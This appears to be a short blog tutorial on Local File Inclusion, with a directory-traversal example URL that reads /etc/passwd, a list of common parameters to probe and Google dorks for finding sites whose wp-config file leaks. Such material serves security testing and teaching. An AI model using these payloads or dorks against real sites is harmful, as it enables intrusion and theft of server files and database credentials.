LFI Parameters List

LFI (Local File Inclusion)

Local file inclusion (also known as LFI) is the process of including files, that are already locally present on the server, through the exploiting of vulnerable inclusion procedures implemented in the application. This vulnerability occurs, for example, when a page receives, as input, the path to the file that has to be included and this input is not properly sanitized, allowing directory traversal characters (such as dot-dot-slash) to be injected. Although most examples point to vulnerable PHP scripts, we should keep in mind that it is also common in other technologies such as JSP, ASP and others. [1]

Example of test:

Consider the URL

 http://vulnerable_host/preview.php?file=example.html

The parameter file= could be exploited to point it to another file within the server

 http://vulnerable_host/preview.php?file=../../../../etc/passwd

The expected result is shown below:

 root:x:0:0:root:/root:/bin/bash
 bin:x:1:1:bin:/bin:/sbin/nologin
 daemon:x:2:2:daemon:/sbin:/sbin/nologin
 alex:x:500:500:alex:/home/alex:/bin/bash
 margo:x:501:501::/home/margo:/bin/bash
 ...

There is a list of most common parameters to test for LFI

 ?cat=
 ?dir=
 ?action=
 ?board=
 ?date=
 ?detail=
 ?file=
 ?download=
 ?path=
 ?folder=
 ?prefix=
 ?include=
 ?page=
 ?inc=
 ?locate=
 ?show=
 ?doc=
 ?site=
 ?type=
 ?view=
 ?content=
 ?document=
 ?layout=
 ?mod=
 ?conf=

You can use Google Hacking and dorks to find vulnerable targets like:

 inurl:"wp-license.php?file=../..//wp-config"

File contain password and directory traversal vulnerability [2]

Using the same strategy to exploit wordpress and retrieve the wp-config, you could use all those parameters above and create your own Google Hacking Dork to analyze your target.

 inurl:"?cat=" site:"example.com" 

References:

[1] OWASP - LFI

[2] GHDB

Thanks for following!